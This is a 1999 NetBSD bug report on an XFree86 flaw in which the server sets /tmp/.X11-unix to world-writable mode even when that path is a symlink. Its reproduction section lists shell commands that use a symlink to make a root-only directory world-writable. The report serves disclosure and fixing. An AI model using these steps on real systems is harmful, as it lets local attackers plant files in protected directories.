Subject: xsrc/7281: XFree86 and /tmp/.X11-unix permissions
To: None <gnats-bugs@gnats.netbsd.org>
From: Hubert Feyrer <feyrer@rfhs8012.fh-regensburg.de>
List: netbsd-bugs
Date: 03/29/1999 19:24:14
>Number: 7281
>Category: xsrc
>Synopsis: XFree86 and /tmp/.X11-unix permissions
>Confidential: yes
>Severity: critical
>Priority: high
>Responsible: gnats-admin (GNATS administrator)
>State: open
>Class: sw-bug
>Submitter-Id: net
>Arrival-Date: Mon Mar 29 09:35:01 1999
>Last-Modified:
>Originator: Hubert Feyrer
>Organization:
Hubert Feyrer <hubertf@channel.regensburg.org>
>Release: <10 days old
>Environment:
System: NetBSD rfhpc8002 1.3K NetBSD 1.3K (YUI) #13: Tue Mar 23 13:13:06 MET 1999 feyrer@rfhpc8002:/usr/cvs/src/sys/arch/i386/compile/YUI i386
>Description:
From Freshmeat.net:
A new vulnerability has been found in XFree86. XFree86 creates a directory
in /tmp with the name .X11-unix for the X sockets and sets the directory to
mode 1777. If an attacker creates a symlink with that filename and points
it to another directory (e.g. /root), the permissions of the target directory is
set to 1777, thus a local attacker may create files with any contents in any
directory. The original SuSe security is available at the Bugtraq archive.
Updated packages for SuSe Linux are available on the SuSe FTP Server.
The bugtraq entry is at http://www.geek-girl.com/bugtraq/1999_1/1138.html
>How-To-Repeat:
cd /tmp
install -dm 700 -o root secretdir
ls -dla /tmp/secretdir
-> drwx------ 2 root wheel 512 Mar 29 19:17 secretdir
ln -s secretdir .X11-unix
XF86_3DLabs (chosen at random)
ls -dla /tmp/secretdir
-> drwxrwxrwt 2 root wheel 512 Mar 29 19:17 /tmp/secretdir
>Fix:
Unknown.
>Audit-Trail:
>Unformatted: